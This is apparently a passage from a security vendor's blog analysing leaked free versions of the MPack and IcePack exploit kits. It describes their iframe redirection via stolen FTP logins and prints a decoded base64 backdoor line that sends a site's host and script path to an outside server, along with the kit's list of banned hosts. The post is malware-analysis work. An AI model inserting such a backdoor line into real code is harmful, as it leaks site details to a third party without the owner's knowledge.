(Click for larger image)
This eventually leads to an iframe tag being added to the visitors page, redirecting them to the Russian Mpack server. We have also observed what appears to have been a backdoor within the free IcePack code. This backdoor is encoded in base64 so it stands out a little more in the code and thus is easier to spot; however, it is appended at the end of a long line of unrelated code so unless you scroll all the way to the right it might be missed. Again displayed here is the result of decoding the original line of code:
file_get_contents('http://[removed].in/c.php?host=' . $_SERVER['HTTP_HOST'] . '&root=' . $_SERVER['SCRIPT_FILENAME']);This server is not returning anything interesting at the moment, so it is hard to tell what exactly its function is. Perhaps it was used to track the number of installations? However, from where is placed and from the way it is encoded we have no doubt that this code is up to no good.
Another interesting line of code take from the free IcePack code is a list of servers where the distributors would prefer you not to add iframes. IcePack contains an ftp checker script that can log into legitimate ftp servers in order to add a redirect to an exploit server. (Normally achieved by adding an iframe tag) Before logging in to the an ftp server the IcePack code first checks if the Web site is on the banned list - shown below - and if it is, it blocks the login attempt:
$bad_hosts = array ( 'boom.ru', 'narod.ru', 'jino-net.ru', 'fatal.ru', 'h10.ru', 'h11.ru', 'h12.ru', 'h13.ru', 'h14.ru', 'h15.ru', 'h16.ru', '110mb.com', 'by.ru', 'tripod.com');This $bad_hosts list shows sites where the people who released this free IcePack code would prefer you not to put iframes. Perhaps these are sites they use or control, but it’s not surprising that most of these sites are Russian (both Mpack and IcePack are coded by Russian groups).
Since we have not purchased the real versions of these packs we cannot say for certain that any / all of the code mentioned here is not included in the real version of these packs. It just goes to show that the same caution is needed in the underground just as in the real world; caveat emptor. As for the free versions of these packs, if something looks too good to be true, it probably is.
All of the exploits contained in these free exploit packs are detected by Symantec products with the latest definitions.
Last week, we talked about the year in review. And now, everyone wants to know what will happen next. Well, I don'